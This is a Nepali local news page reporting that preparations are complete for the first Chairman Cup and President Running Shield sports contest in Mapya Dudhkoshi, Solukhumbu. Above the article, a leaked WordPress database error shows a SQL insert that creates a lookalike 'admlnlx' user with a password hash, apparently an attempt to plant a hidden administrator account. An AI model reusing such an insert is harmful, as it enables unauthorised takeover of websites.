WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkRH0HnvE/HRt4heU/oSL39zEoECGM.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 17:08:06', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । माप्य दुधकोशी गाउँपालिका द्धारा सञ्चालन हुने प्रथम अध्यक्ष कप तथा पन्ध्रौं राष्ट्रपति रनिङ शिल्ड प्रतियोगिताको तयारी पुरा भएको छ ।
भोलि माघ ३० बाट माप्य दुधकाोशी गाउँपालिका वडा नं. ४ कोर्कुमा निर्माणधिन रंगशालामा सञ्चालन हुने उक्त प्रतियोगिताको सम्पूर्ण तयारी पुरा भएको माप्य दुधकोशी गाउँपालिका प्रबक्ता अमित खालिङ राईले जानकरी दिए ।
नेपाल सरकारका उप–प्रधान तथा अर्थमन्त्रि बिष्णु प्रसाद पौंडेलको प्रमुख आतिथ्यमा सञ्चानल हुने कार्यक्रममा नेपाल सरकारका रक्षा मन्त्रि मा.मानबीर खालिङ राई, कोशी प्रदेशका पूर्व मन्त्रि मा.बुद्धिकुमार राजभण्डरी, सडक विभाग प्रमुख रामहरी पोखरेल, सोलुखुम्बु जिल्लाका प्रमुख जिल्ला अधिकारी अनोजकुमार घिमिरे, सोलुखुम्बु जिल्लाका विभिन्न कार्यलयका प्रमुख, विभिन्न राजनीतिक दलका प्रमुख, माप्य दुधकोशी गाउँपालिका अन्तरगतका विद्यालयका प्रधानाध्यपक, शिक्षकहरुको उपस्तिथि रहने प्रबक्ता खालिङ राईले बताए ।
उक्त कार्यक्रममा माप्य दुधकोशी गाउँपालिकाबाट एस.ई.ई.२०८० मा सहभागि मध्ये उत्कृट विद्यार्थी, बि.एल.ई.२०८० मा सहभागि मध्ये उत्कृट विद्यार्थी र विद्यालयलाई सम्मान गर्ने कार्यक्रम पनि रहेको प्रबक्ता खालिङ राईले बताए ।